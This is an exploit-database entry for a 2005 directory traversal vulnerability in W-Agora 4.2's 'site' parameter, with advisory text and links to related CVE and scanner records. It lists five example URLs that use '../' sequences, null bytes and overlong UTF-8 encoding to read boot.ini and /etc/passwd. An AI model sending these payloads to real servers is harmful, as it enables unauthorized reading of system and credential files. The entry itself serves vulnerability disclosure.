Lucene search
Matrix_killerEDB-ID:26169HistoryAug 18, 2005 - 12:00 a.m.
W-Agora 4.2 - 'Site' Directory Traversal
2005-08-1800:00:00
matrix_killer
www.exploit-db.com
16
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/14597/info
W-Agora is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An unauthorized user can retrieve arbitrary files by supplying directory traversal strings '../' to the vulnerable parameter. Exploitation of this vulnerability could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd
http://www.example.com/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini Related
openvas
openvas
W-Agora 'site' Parameter Directory Traversal Vulnerability
2006-03-26 00:00:00
cvelist
cvelist
CVE-2005-2648
2005-08-21 04:00:00
nessus
nessus
w-Agora index.php site Parameter Traversal Arbitrary File Access
2005-08-22 00:00:00
nvd
nvd
CVE-2005-2648
2005-08-23 04:00:00
cve
cve
CVE-2005-2648
2005-08-23 04:00:00